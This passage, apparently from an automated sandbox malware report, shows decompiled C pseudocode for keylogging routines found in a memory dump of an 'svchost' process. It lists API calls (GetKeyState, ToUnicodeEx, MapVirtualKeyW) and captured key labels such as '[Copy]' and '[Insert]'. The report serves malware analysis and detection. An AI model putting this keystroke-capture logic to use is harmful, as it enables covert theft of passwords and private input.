					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Arrow Left], xrefs: 00C85C9E

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85A05, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A05(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Numpad -]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Numpad -], xrefs: 00C85A07

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85A7C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A7C(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Arrow Down]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Arrow Down], xrefs: 00C85A7E

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8596C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8596C(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Copy]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Copy], xrefs: 00C8596E

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85D76, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D76(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Arrow Right]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Arrow Right], xrefs: 00C85D78

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85AE2, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85AE2(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F13]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F13], xrefs: 00C85AE4

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85C58, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C58(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Insert]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
